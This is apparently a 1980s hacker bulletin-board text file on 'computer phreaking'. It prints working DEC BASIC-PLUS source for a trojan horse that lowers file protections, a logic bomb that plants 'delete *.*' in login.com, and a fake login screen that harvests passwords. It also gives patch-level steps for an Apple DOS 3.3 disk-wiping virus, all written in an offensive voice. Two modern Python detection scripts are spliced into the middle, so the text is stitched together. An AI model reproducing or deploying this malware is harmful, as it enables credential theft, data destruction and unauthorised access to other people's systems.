Filename = BBSFILES.DOC



THE FOLLOWING FILES WERE DOWNLOADED BY ME IN ONE EVENING, USING AN IBM-PC AND
MODEM.  THEY WERE DOWNLOADED TO SHOW THE NATURE OF THE INFORMATION READILY
AVAILABLE TO THE THOUSANDS WHO ACCESS HACKER BOARDS - PROVIDED FOR
EDUCATIONAL PURPOSES ONLY, AND NOT TO RECOMMEND OR IMPLY ANY ILLEGAL USE
WHATSOEVER.  THESE FILES JUST RELATE TO COMPUTER PHREAKING.  THERE ARE MANY
MORE ON PHONE BOXING, WEAPONRY AND EXPLOSIVES, LOCKPICKING - YOU NAME IT!

(we are very interested in increasing this file for future updates of
COMPUTER PHREAKING and, separately, adding similar files for our PHONE COLOR
BOXES, and other technical and survival topics we have interest in (see our
catalog).  If you have some good public domain info. for us, please send it
to us in an ASCII file(s), on 5.25" or 3.5" disk (use First Class Mail only),
to:  CONSUMERTRONICS, 2011 Crescent Dr., P.O.  Drawer 537, Alamogordo, NM
88310.  If you require compensation for your help, let us know in advance
what you have and what you would like for it.)





D/L1------------------------------



Virus, Trojan Horse, and Decoy Programs:



DEC MAINFRAMES:

===============

    The following were developed and tested on DEC Basic Plus, running under
the RSTS/E Operating system. All have been tested, and were successfully used
in the field.  However, successful use depends on the savvy of the sysop,
legitimate users, and illegitimate ones.  They work best on uninformed
(stupid) users and sysops, and when the hacker using them makes them
attractive, as when using trojan horses, or realistic, when using decoys.



TROJAN HORSE:

=============

     What follows is a rough listing of the business end of a typical trojan
horse program.  While this one just lowers the security of the programs on
the affected account, it could be easily modified to create another account,
or execute any other command. The key is the 'sy$=sys(chr$(14)+"....")'
statement.  In BASIC PLUS Programming language, this command lets you execute
a DCL command from within a BASIC Program.  Therefore, any DCL command, COPY,
DELETE, PIP, or even BYE could be inserted in the "...." space. I prefer
using PIP *.* <40> /RE, as what that will do is lower the protection codes
low enough for me to see the files on the account.  This works with both
sysops and non-privileged users, so I can benefit whenever someone runs it,
as opposed to something the sysop has to run in order for it to do whatever.
As a plus, if a sysop runs it, certain hidden files on the [1,*] account
he/she's using will become visible, which will, provided you know what you're
doing, enable you to get sysop status. Of course, you could also use PIP
[*,*] *.* <40> /RE, which, if a sysop runs it, will lower the protection of
every file on the system; one would have to add an error checking routine in
case a non-sysop ran it.



    10 extend
    20 sy$=sys(chr$(14)+"PIP *.* <40> /RE")
    30 rem the following would be the interesting little game you've written which
    40 rem makes the program look attractive, and compels the hapless user to
    50 rem run it.
    60 end



LOGIC BOMB:

===========

     The following is an example of a simple logic bomb, which has proven to
work very well. What it does is create a file on the affected account which
will delete all files on the account upon the next login. It also dumps the
user off the system for good measure. You could remove the logoff procedure,
and not affect program operation, but they then stand a chance of noticing
the little file you've added.



    10 extend

    20 open "login.com" as file #1

    30 print #1,"pip *.* <60> /re"

    40 print #1,"delete *.*"

    50 close #1

    60 sy$=sys(chr$(14)+"bye/f")

    70 end



     Now, line 30 is optional in this program. I have included it in case the
user has protected his files from accidental deletion.  There is one instance
in which this program won't work properly. This is when the default language
upon logon isn't DCL; on occasion, some systems have BASIC as the default. In
this case, just add the following line.



    25 print #1,"sw dcl"



And you'll switch to DCL before continuing to the rest of the program.
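Seen from the defender's side, both the trojan horse and the logic bomb listings above leave the same traces in source form: a command string passed through sys(chr$(14)+...) and lines written into login.com. The Python scanner below is an added example, not part of the original file; the function name scan, the category labels and the STARTUP_FILES set are assumptions made for this illustration, and the sample input reuses the listings already printed above.

```python
import re

# Statement shapes taken from the BASIC-PLUS listings in this file.
SYS_EXEC = re.compile(r'sys\s*\(\s*chr\$\s*\(\s*14%?\s*\)\s*\+\s*"([^"]*)"', re.I)
OPEN_CH = re.compile(r'open\s+"([^"]+)"\s+as\s+file\s+#?\s*(\d+)', re.I)
PRINT_CH = re.compile(r'print\s+#\s*(\d+)%?\s*,\s*"([^"]*)"', re.I)
CLOSE_CH = re.compile(r'close\s+#?\s*(\d+)', re.I)
STARTUP_FILES = {"login.com"}           # assumption: extend per site

def scan(listing):
    """Return (line_no, category, detail) findings for one program listing."""
    findings, startup_channels = [], set()
    for raw in listing.splitlines():
        m = re.match(r'\s*(\d+)\s+(.*)', raw)
        if not m:
            continue                    # blank or unnumbered line
        line_no, stmt = int(m.group(1)), m.group(2).strip()
        if stmt.lower().startswith("rem"):
            continue                    # comments cannot execute anything
        for cmd in SYS_EXEC.findall(stmt):
            findings.append((line_no, "exec", cmd))
        for name, ch in OPEN_CH.findall(stmt):
            if name.lower() in STARTUP_FILES:
                startup_channels.add(ch)
                findings.append((line_no, "startup-open", name))
        for ch, text in PRINT_CH.findall(stmt):
            if ch in startup_channels:  # command planted for the next login
                findings.append((line_no, "startup-write", text))
        for ch in CLOSE_CH.findall(stmt):
            startup_channels.discard(ch)
    return findings

# Sample input: the two listings printed above, reused as test data.
TROJAN = '''10 extend
20 sy$=sys(chr$(14)+"PIP *.* <40> /RE")
30 rem game code would follow here
60 end'''
LOGIC_BOMB = '''10 extend
20 open "login.com" as file #1
30 print #1,"pip *.* <60> /re"
40 print #1,"delete *.*"
50 close #1
60 sy$=sys(chr$(14)+"bye/f")
70 end'''
BENIGN = '''10 print "hello"
20 rem sys(chr$(14)+"delete *.*") is only mentioned in a comment'''

if __name__ == "__main__":
    for name, src in [("trojan", TROJAN), ("logic bomb", LOGIC_BOMB), ("benign", BENIGN)]:
        print(name, scan(src))
```

A shared program library can be swept with this before anything is run; any "exec" or "startup-write" finding in a program that claims to be a game is reason to read the source first.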



THE DECOY:

==========

     This decoy is to be used on local terminals, ones that are connected to
the system via RS-232, such as in schools. It is also the riskiest of these
programs to use. What it basically does is wait until input, and then act as a
login program, saving the user's ID# and password. Upon getting it, it informs
the user of an "invalid entry" and then returns control to the system.  There
are a number of things to keep in mind when using this program. The first is
to change the program so it looks like your system.   The second is to
remember that it runs under the account it's on, therefore you take a risk of
someone hitting [Break] while it's running, and getting into your account.
Finally, due to the BASIC language, you'll only get the project number of the
account (what's before the comma). However, since you'll have the password,
you'll get it in less than 255 tries.



    10 extend

    20 open "kb:" as file #1%

    30 input #1%, z$

    40 print "RSTS v8.0-06 MICOM I Job <10> KB31:  ";date$(0);" ";time$(0)

    50 print

    60 print "Username:  ";

    70 input #1%, u$

    80 print "Password: ";

    90 sy$=sys(chr$(3))

    100 input #1%, p$

    110 sy$=sys(chr$(2))

    120 print:  print "Invalid Entry - Try Again"

    130 print:  print

    140 print "Username: ";

    150 input #1%, r$

    160 sy$=sys(chr$(3))

    170 print "Password: ";

    180 input #1%, s$

    190 sy$=sys(chr$(2))

    200 open "acct.txt" as file #2

    210 print #2,u$

    220 print #2,p$

    230 print #2,r$

    240 print #2,s$

    250 close #2

    260 print:  print "Access Denied"

    270 sy$=sys(chr$(14)+"bye/f")

    280 end



     The parts which have to be changed are line 40, and the number of tries
it allows before logging you off. The system I used for development allowed
only two tries, and most I've seen only allow two, but it isn't always that
way.  Finally, remember to save ALL input, for reasons which should be
obvious.



FREE MEMORY:

============

     While this program isn't classified as a trojan horse, decoy, logic
bomb, or virus, it's quite interesting, and I've decided to include it.  This
program enables you to look at unallocated space on the system's disk.  It's
very useful when the sysop is creating and deleting accounts, and in schools
in order to yank deleted files, which happens when students are modifying
programs.



    10 open "free.mem" as file #1%

    20 put #1%, record nnnnn%

    30 close #1%



GENERAL NOTES ON PC VIRUSES

===========================

     Writing "funny programs" on PCs is a big pain-in-the-a__.  There are two
major reasons why.  The first is that most users know their PCs (Personal
Computers in general, not just IBM) like the back of their hand, and that any
weirdness would be immediately noticed, unlike a big multiuser system, where
they are amongst other users, and basically isolated in their own little
section of RAM.  Secondly, they have to be extremely small, so as to be hidden
effectively.  While one can write the perfect virus with 64k, try writing
one in a few bytes of space.  Personally, I feel the best way to screw over a
computer user is to put a magnet to his disks, but if you want to do it the
hard way, it is possible.



APPLE II+, //e. //c:

====================

     The Apple series of computers is one of the simplest machines to
"infect", so to speak. Perhaps this is because its creator was a prima donna
hacker, but who knows. DOS 3.3 has several unused spots in it, which are
adequate to hide a virus in. They are (in hex) $B78D-$B792 and $BCDF-$BCFF.
You can also, on pre-1983 versions of DOS 3.3, use BA69-BA93. There are also
some spots which aren't unused, but are used for DOS commands such as
VERIFY, LOCK, UNLOCK, CHAIN, and MAXFILES.  The classic virus program on the
Apple is a machine language program which counts how many times someone does a
certain function, such as CATALOG, LOAD, or SAVE, and upon reaching a certain
number, initializes the disk. It is based in DOS memory, which means that
once the affected disk is booted, it stays in the machine until power down,
and can affect any disk which is used with said machine. It will also be
transferred to any disk which is initialized by the machine. The actual program
is very simple, provided you know 6502 machine language. What you do is make
a patch to the Command handler entry point for the Catalog command. The
location for the command handler is from $9D1E to $9D55.  Look around in
there until you find a string which says "6EA5"; this is the entry point for
the Catalog Handler, which is $A56E. Remember that.  Change it to the
beginning of your "modification". I recommend $BCDF, since it is the biggest
stretch of memory which is truly safe.  You then write a program which will
do an LDX (Load X Register) from a memory location where your counter is,
say $B78D. You compare that memory to the number of times you want the
command to go through before deletion, say 20 hex. (CPA $20) If the number of
times is greater than the number in the Compare statement ($20) then jump
to the init subroutine (BPL $4F5A)(The INIT start location is $5A4F), if not,
then Increment the X Register by 1 (INX $01), store it (STX $8DB7), you then
continue with your program by Cataloging the disk (JMP $6EA5).  End of
program.  I have found this to be one of the best virus programs, as these
things go.
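The memory ranges named above are also what an integrity check has to cover. The Python sketch below is an added example, not part of the original file: it compares a suspect 64K memory dump against a known-good dump of the same DOS 3.3 version and reports changes in the slack regions and in the command handler table. The function names and the sample images are constructed for illustration, and a trusted reference dump is assumed to be available.

```python
# Address ranges quoted in the text above (inclusive), for DOS 3.3 in memory.
SLACK = [(0xB78D, 0xB792), (0xBCDF, 0xBCFF), (0xBA69, 0xBA93)]  # last: pre-1983 only
TABLE = (0x9D1E, 0x9D55)   # command handler table, read as 16-bit little-endian words

def in_slack(addr):
    return any(lo <= addr <= hi for lo, hi in SLACK)

def word(image, addr):
    return image[addr] | (image[addr + 1] << 8)

def check_image(reference, suspect):
    """Return (kind, address, detail) findings; an empty list means no change
    in the regions this file names."""
    findings = []
    for lo, hi in SLACK:
        changed = [a for a in range(lo, hi + 1) if reference[a] != suspect[a]]
        if changed:
            findings.append(("slack-modified", changed[0], len(changed)))
    for a in range(TABLE[0], TABLE[1] + 1, 2):
        ref, cur = word(reference, a), word(suspect, a)
        if cur != ref:
            # The file does not settle whether the table holds the handler
            # address or the address minus one, so both readings are tested.
            redirected = in_slack(cur) or in_slack(cur + 1)
            kind = "vector-into-slack" if redirected else "vector-changed"
            findings.append((kind, a, cur))
    return findings

def build_samples():
    """Constructed test data: blank 64K images, not real DOS 3.3 dumps."""
    reference = bytearray(0x10000)
    slot = TABLE[0] + 10                  # constructed slot, position is arbitrary
    reference[slot], reference[slot + 1] = 0x6E, 0xA5   # word $A56E from the text
    suspect = bytearray(reference)
    suspect[slot], suspect[slot + 1] = 0xDF, 0xBC       # word now reads $BCDF
    suspect[0xBCDF:0xBCE3] = b"\xff" * 4                # placeholder bytes, not code
    suspect[0xB78D] = 0x05                              # a changed counter byte
    return reference, suspect, slot

if __name__ == "__main__":
    ref, sus, _ = build_samples()
    for kind, addr, detail in check_image(ref, sus):
        print(f"{kind:18} ${addr:04X} {detail:#x}")
```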





D/L2---------------------------------------